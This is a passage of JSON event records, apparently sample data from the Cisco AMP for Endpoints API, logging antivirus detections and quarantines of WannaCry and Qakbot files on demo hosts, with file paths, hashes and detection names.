Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419204901661835282","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204901661835000,"timestamp":1610629577,"timestamp_nanoseconds":537000000,"date":"2021-01-14T13:06:17+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419204901661835281","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204901661835000,"timestamp":1610629577,"timestamp_nanoseconds":537000000,"date":"2021-01-14T13:06:17+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419204901661835280","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204901661835000,"timestamp":1610629577,"timestamp_nanoseconds":459000000,"date":"2021-01-14T13:06:17+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Ransom:Gen.20gl.1201","detection_id":"6419204901661835279","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204901661835000,"timestamp":1610629577,"timestamp_nanoseconds":443000000,"date":"2021-01-14T13:06:17+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419204901661835278","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204901661835000,"timestamp":1610629577,"timestamp_nanoseconds":100000000,"date":"2021-01-14T13:06:17+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419204901661835277","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204901661835000,"timestamp":1610629577,"timestamp_nanoseconds":69000000,"date":"2021-01-14T13:06:17+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419204901661835276","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204901661835000,"timestamp":1610629577,"timestamp_nanoseconds":6000000,"date":"2021-01-14T13:06:17+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419204897366867979","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204901661835000,"timestamp":1610629577,"timestamp_nanoseconds":646000000,"date":"2021-01-14T13:06:17+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6419204897366867971","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204901661835000,"timestamp":1610629577,"timestamp_nanoseconds":646000000,"date":"2021-01-14T13:06:17+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6419204897366867969","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204897366868000,"timestamp":1610629576,"timestamp_nanoseconds":975000000,"date":"2021-01-14T13:06:16+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419204897366867978","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"},"parent":{"process_id":3060,"disposition":"Clean","file_name":"cmd.exe","identity":{"sha256":"17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae","sha1":"ee8cbf12d87c4d388f09b4f69bed2e91682920b5","md5":"ad7b9c14083b52bc532fba5948342b98"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204897366868000,"timestamp":1610629576,"timestamp_nanoseconds":897000000,"date":"2021-01-14T13:06:16+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419204897366867977","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"},"parent":{"process_id":796,"disposition":"Malicious","file_name":"tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204897366868000,"timestamp":1610629576,"timestamp_nanoseconds":850000000,"date":"2021-01-14T13:06:16+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419204897366867976","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\Windows\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204897366868000,"timestamp":1610629576,"timestamp_nanoseconds":726000000,"date":"2021-01-14T13:06:16+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419204897366867975","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204897366868000,"timestamp":1610629576,"timestamp_nanoseconds":694000000,"date":"2021-01-14T13:06:16+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419204897366867974","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204897366868000,"timestamp":1610629576,"timestamp_nanoseconds":632000000,"date":"2021-01-14T13:06:16+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419204897366867973","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204897366868000,"timestamp":1610629576,"timestamp_nanoseconds":632000000,"date":"2021-01-14T13:06:16+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419204897366867972","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204897366868000,"timestamp":1610629576,"timestamp_nanoseconds":585000000,"date":"2021-01-14T13:06:16+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419204897366867971","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204897366868000,"timestamp":1610629576,"timestamp_nanoseconds":554000000,"date":"2021-01-14T13:06:16+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419204897366867970","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\WINDOWS\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"},"parent":{"process_id":1064,"disposition":"Malicious","file_name":"mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"e889544aff85ffaf8b0d0da705105dee7c97fe26","md5":"db349b97c37d22f5ea1d1841e3c89eb4"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204897366868000,"timestamp":1610629576,"timestamp_nanoseconds":460000000,"date":"2021-01-14T13:06:16+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419204897366867969","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\Windows\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"},"parent":{"process_id":1064,"disposition":"Malicious","file_name":"mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"e889544aff85ffaf8b0d0da705105dee7c97fe26","md5":"db349b97c37d22f5ea1d1841e3c89eb4"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411462922463085000,"timestamp":1610629066,"timestamp_nanoseconds":103000000,"date":"2021-01-14T12:57:46+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6411462918168117251","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411462922463085000,"timestamp":1610629066,"timestamp_nanoseconds":103000000,"date":"2021-01-14T12:57:46+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6411462918168117252","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411462918168117000,"timestamp":1610629065,"timestamp_nanoseconds":573000000,"date":"2021-01-14T12:57:45+00:00","event_type":"Threat 